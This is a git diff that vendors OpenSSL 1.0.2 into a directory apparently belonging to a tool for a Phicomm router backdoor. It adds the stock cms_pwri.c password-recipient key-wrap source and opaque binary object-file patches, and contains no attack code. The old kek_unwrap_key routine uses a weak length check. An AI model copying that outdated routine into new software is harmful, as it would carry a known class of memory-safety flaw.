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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_pwri.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_pwri.c
new file mode 100644
index 0000000..d93b14f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_pwri.c
@@ -0,0 +1,429 @@
+/* crypto/cms/cms_pwri.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2009 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include <openssl/err.h>
+#include <openssl/cms.h>
+#include <openssl/rand.h>
+#include <openssl/aes.h>
+#include "cms_lcl.h"
+#include "asn1_locl.h"
+
+int CMS_RecipientInfo_set0_password(CMS_RecipientInfo *ri,
+                                    unsigned char *pass, ossl_ssize_t passlen)
+{
+    CMS_PasswordRecipientInfo *pwri;
+    if (ri->type != CMS_RECIPINFO_PASS) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_SET0_PASSWORD, CMS_R_NOT_PWRI);
+        return 0;
+    }
+
+    pwri = ri->d.pwri;
+    pwri->pass = pass;
+    if (pass && passlen < 0)
+        passlen = strlen((char *)pass);
+    pwri->passlen = passlen;
+    return 1;
+}
+
+CMS_RecipientInfo *CMS_add0_recipient_password(CMS_ContentInfo *cms,
+                                               int iter, int wrap_nid,
+                                               int pbe_nid,
+                                               unsigned char *pass,
+                                               ossl_ssize_t passlen,
+                                               const EVP_CIPHER *kekciph)
+{
+    CMS_RecipientInfo *ri = NULL;
+    CMS_EnvelopedData *env;
+    CMS_PasswordRecipientInfo *pwri;
+    EVP_CIPHER_CTX ctx;
+    X509_ALGOR *encalg = NULL;
+    unsigned char iv[EVP_MAX_IV_LENGTH];
+    int ivlen;
+
+    env = cms_get0_enveloped(cms);
+    if (!env)
+        return NULL;
+
+    if (wrap_nid <= 0)
+        wrap_nid = NID_id_alg_PWRI_KEK;
+
+    if (pbe_nid <= 0)
+        pbe_nid = NID_id_pbkdf2;
+
+    /* Get from enveloped data */
+    if (kekciph == NULL)
+        kekciph = env->encryptedContentInfo->cipher;
+
+    if (kekciph == NULL) {
+        CMSerr(CMS_F_CMS_ADD0_RECIPIENT_PASSWORD, CMS_R_NO_CIPHER);
+        return NULL;
+    }
+    if (wrap_nid != NID_id_alg_PWRI_KEK) {
+        CMSerr(CMS_F_CMS_ADD0_RECIPIENT_PASSWORD,
+               CMS_R_UNSUPPORTED_KEY_ENCRYPTION_ALGORITHM);
+        return NULL;
+    }
+
+    /* Setup algorithm identifier for cipher */
+    encalg = X509_ALGOR_new();
+    EVP_CIPHER_CTX_init(&ctx);
+
+    if (EVP_EncryptInit_ex(&ctx, kekciph, NULL, NULL, NULL) <= 0) {
+        CMSerr(CMS_F_CMS_ADD0_RECIPIENT_PASSWORD, ERR_R_EVP_LIB);
+        goto err;
+    }
+
+    ivlen = EVP_CIPHER_CTX_iv_length(&ctx);
+
+    if (ivlen > 0) {
+        if (RAND_pseudo_bytes(iv, ivlen) <= 0)
+            goto err;
+        if (EVP_EncryptInit_ex(&ctx, NULL, NULL, NULL, iv) <= 0) {
+            CMSerr(CMS_F_CMS_ADD0_RECIPIENT_PASSWORD, ERR_R_EVP_LIB);
+            goto err;
+        }
+        encalg->parameter = ASN1_TYPE_new();
+        if (!encalg->parameter) {
+            CMSerr(CMS_F_CMS_ADD0_RECIPIENT_PASSWORD, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (EVP_CIPHER_param_to_asn1(&ctx, encalg->parameter) <= 0) {
+            CMSerr(CMS_F_CMS_ADD0_RECIPIENT_PASSWORD,
+                   CMS_R_CIPHER_PARAMETER_INITIALISATION_ERROR);
+            goto err;
+        }
+    }
+
+    encalg->algorithm = OBJ_nid2obj(EVP_CIPHER_CTX_type(&ctx));
+
+    EVP_CIPHER_CTX_cleanup(&ctx);
+
+    /* Initialize recipient info */
+    ri = M_ASN1_new_of(CMS_RecipientInfo);
+    if (!ri)
+        goto merr;
+
+    ri->d.pwri = M_ASN1_new_of(CMS_PasswordRecipientInfo);
+    if (!ri->d.pwri)
+        goto merr;
+    ri->type = CMS_RECIPINFO_PASS;
+
+    pwri = ri->d.pwri;
+    /* Since this is overwritten, free up empty structure already there */
+    X509_ALGOR_free(pwri->keyEncryptionAlgorithm);
+    pwri->keyEncryptionAlgorithm = X509_ALGOR_new();
+    if (!pwri->keyEncryptionAlgorithm)
+        goto merr;
+    pwri->keyEncryptionAlgorithm->algorithm = OBJ_nid2obj(wrap_nid);
+    pwri->keyEncryptionAlgorithm->parameter = ASN1_TYPE_new();
+    if (!pwri->keyEncryptionAlgorithm->parameter)
+        goto merr;
+
+    if (!ASN1_item_pack(encalg, ASN1_ITEM_rptr(X509_ALGOR),
+                        &pwri->keyEncryptionAlgorithm->parameter->
+                        value.sequence))
+         goto merr;
+    pwri->keyEncryptionAlgorithm->parameter->type = V_ASN1_SEQUENCE;
+
+    X509_ALGOR_free(encalg);
+    encalg = NULL;
+
+    /* Setup PBE algorithm */
+
+    pwri->keyDerivationAlgorithm = PKCS5_pbkdf2_set(iter, NULL, 0, -1, -1);
+
+    if (!pwri->keyDerivationAlgorithm)
+        goto err;
+
+    CMS_RecipientInfo_set0_password(ri, pass, passlen);
+    pwri->version = 0;
+
+    if (!sk_CMS_RecipientInfo_push(env->recipientInfos, ri))
+        goto merr;
+
+    return ri;
+
+ merr:
+    CMSerr(CMS_F_CMS_ADD0_RECIPIENT_PASSWORD, ERR_R_MALLOC_FAILURE);
+ err:
+    EVP_CIPHER_CTX_cleanup(&ctx);
+    if (ri)
+        M_ASN1_free_of(ri, CMS_RecipientInfo);
+    if (encalg)
+        X509_ALGOR_free(encalg);
+    return NULL;
+
+}
+
+/*
+ * This is an implementation of the key wrapping mechanism in RFC3211, at
+ * some point this should go into EVP.
+ */
+
+static int kek_unwrap_key(unsigned char *out, size_t *outlen,
+                          const unsigned char *in, size_t inlen,
+                          EVP_CIPHER_CTX *ctx)
+{
+    size_t blocklen = EVP_CIPHER_CTX_block_size(ctx);
+    unsigned char *tmp;
+    int outl, rv = 0;
+    if (inlen < 2 * blocklen) {
+        /* too small */
+        return 0;
+    }
+    if (inlen % blocklen) {
+        /* Invalid size */
+        return 0;
+    }
+    tmp = OPENSSL_malloc(inlen);
+    /* setup IV by decrypting last two blocks */
+    EVP_DecryptUpdate(ctx, tmp + inlen - 2 * blocklen, &outl,
+                      in + inlen - 2 * blocklen, blocklen * 2);
+    /*
+     * Do a decrypt of last decrypted block to set IV to correct value output
+     * it to start of buffer so we don't corrupt decrypted block this works
+     * because buffer is at least two block lengths long.
+     */
+    EVP_DecryptUpdate(ctx, tmp, &outl, tmp + inlen - blocklen, blocklen);
+    /* Can now decrypt first n - 1 blocks */
+    EVP_DecryptUpdate(ctx, tmp, &outl, in, inlen - blocklen);
+
+    /* Reset IV to original value */
+    EVP_DecryptInit_ex(ctx, NULL, NULL, NULL, NULL);
+    /* Decrypt again */
+    EVP_DecryptUpdate(ctx, tmp, &outl, tmp, inlen);
+    /* Check check bytes */
+    if (((tmp[1] ^ tmp[4]) & (tmp[2] ^ tmp[5]) & (tmp[3] ^ tmp[6])) != 0xff) {
+        /* Check byte failure */
+        goto err;
+    }
+    if (inlen < (size_t)(tmp[0] - 4)) {
+        /* Invalid length value */
+        goto err;
+    }
+    *outlen = (size_t)tmp[0];
+    memcpy(out, tmp + 4, *outlen);
+    rv = 1;
+ err:
+    OPENSSL_cleanse(tmp, inlen);
+    OPENSSL_free(tmp);
+    return rv;
+
+}
+
+static int kek_wrap_key(unsigned char *out, size_t *outlen,
+                        const unsigned char *in, size_t inlen,
+                        EVP_CIPHER_CTX *ctx)
+{
+    size_t blocklen = EVP_CIPHER_CTX_block_size(ctx);
+    size_t olen;
+    int dummy;
+    /*
+     * First decide length of output buffer: need header and round up to
+     * multiple of block length.
+     */
+    olen = (inlen + 4 + blocklen - 1) / blocklen;
+    olen *= blocklen;
+    if (olen < 2 * blocklen) {
+        /* Key too small */
+        return 0;
+    }
+    if (inlen > 0xFF) {
+        /* Key too large */
+        return 0;
+    }
+    if (out) {
+        /* Set header */
+        out[0] = (unsigned char)inlen;
+        out[1] = in[0] ^ 0xFF;
+        out[2] = in[1] ^ 0xFF;
+        out[3] = in[2] ^ 0xFF;
+        memcpy(out + 4, in, inlen);
+        /* Add random padding to end */
+        if (olen > inlen + 4)
+            RAND_pseudo_bytes(out + 4 + inlen, olen - 4 - inlen);
+        /* Encrypt twice */
+        EVP_EncryptUpdate(ctx, out, &dummy, out, olen);
+        EVP_EncryptUpdate(ctx, out, &dummy, out, olen);
+    }
+
+    *outlen = olen;
+
+    return 1;
+}
+
+/* Encrypt/Decrypt content key in PWRI recipient info */
+
+int cms_RecipientInfo_pwri_crypt(CMS_ContentInfo *cms, CMS_RecipientInfo *ri,
+                                 int en_de)
+{
+    CMS_EncryptedContentInfo *ec;
+    CMS_PasswordRecipientInfo *pwri;
+    const unsigned char *p = NULL;
+    int plen;
+    int r = 0;
+    X509_ALGOR *algtmp, *kekalg = NULL;
+    EVP_CIPHER_CTX kekctx;
+    const EVP_CIPHER *kekcipher;
+    unsigned char *key = NULL;
+    size_t keylen;
+
+    ec = cms->d.envelopedData->encryptedContentInfo;
+
+    pwri = ri->d.pwri;
+    EVP_CIPHER_CTX_init(&kekctx);
+
+    if (!pwri->pass) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_PWRI_CRYPT, CMS_R_NO_PASSWORD);
+        return 0;
+    }
+    algtmp = pwri->keyEncryptionAlgorithm;
+
+    if (!algtmp || OBJ_obj2nid(algtmp->algorithm) != NID_id_alg_PWRI_KEK) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_PWRI_CRYPT,
+               CMS_R_UNSUPPORTED_KEY_ENCRYPTION_ALGORITHM);
+        return 0;
+    }
+
+    if (algtmp->parameter->type == V_ASN1_SEQUENCE) {
+        p = algtmp->parameter->value.sequence->data;
+        plen = algtmp->parameter->value.sequence->length;
+        kekalg = d2i_X509_ALGOR(NULL, &p, plen);
+    }
+    if (kekalg == NULL) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_PWRI_CRYPT,
+               CMS_R_INVALID_KEY_ENCRYPTION_PARAMETER);
+        return 0;
+    }
+
+    kekcipher = EVP_get_cipherbyobj(kekalg->algorithm);
+
+    if (!kekcipher) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_PWRI_CRYPT, CMS_R_UNKNOWN_CIPHER);
+        goto err;
+    }
+
+    /* Fixup cipher based on AlgorithmIdentifier to set IV etc */
+    if (!EVP_CipherInit_ex(&kekctx, kekcipher, NULL, NULL, NULL, en_de))
+        goto err;
+    EVP_CIPHER_CTX_set_padding(&kekctx, 0);
+    if (EVP_CIPHER_asn1_to_param(&kekctx, kekalg->parameter) < 0) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_PWRI_CRYPT,
+               CMS_R_CIPHER_PARAMETER_INITIALISATION_ERROR);
+        goto err;
+    }
+
+    algtmp = pwri->keyDerivationAlgorithm;
+
+    /* Finish password based key derivation to setup key in "ctx" */
+
+    if (EVP_PBE_CipherInit(algtmp->algorithm,
+                           (char *)pwri->pass, pwri->passlen,
+                           algtmp->parameter, &kekctx, en_de) < 0) {
+        CMSerr(CMS_F_CMS_RECIPIENTINFO_PWRI_CRYPT, ERR_R_EVP_LIB);
+        goto err;
+    }
+
+    /* Finally wrap/unwrap the key */
+
+    if (en_de) {
+
+        if (!kek_wrap_key(NULL, &keylen, ec->key, ec->keylen, &kekctx))
+            goto err;
+
+        key = OPENSSL_malloc(keylen);
+
+        if (!key)
+            goto err;
+
+        if (!kek_wrap_key(key, &keylen, ec->key, ec->keylen, &kekctx))
+            goto err;
+        pwri->encryptedKey->data = key;
+        pwri->encryptedKey->length = keylen;
+    } else {
+        key = OPENSSL_malloc(pwri->encryptedKey->length);
+
+        if (!key) {
+            CMSerr(CMS_F_CMS_RECIPIENTINFO_PWRI_CRYPT, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        if (!kek_unwrap_key(key, &keylen,
+                            pwri->encryptedKey->data,
+                            pwri->encryptedKey->length, &kekctx)) {
+            CMSerr(CMS_F_CMS_RECIPIENTINFO_PWRI_CRYPT, CMS_R_UNWRAP_FAILURE);
+            goto err;
+        }
+
+        ec->key = key;
+        ec->keylen = keylen;
+
+    }
+
+    r = 1;
+
+ err:
+
+    EVP_CIPHER_CTX_cleanup(&kekctx);
+
+    if (!r && key)
+        OPENSSL_free(key);
+    X509_ALGOR_free(kekalg);
+
+    return r;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_pwri.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_pwri.o
new file mode 100644
index 0000000000000000000000000000000000000000..3c84b9d516bd0a9dfc9c90d32471f61ae13651f4
GIT binary patch
literal 7416
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
E0bFp{RsaA1

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_sd.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cms/cms_sd.c
new file mode 100644
index 0000000..721ffd5
--- /dev/null
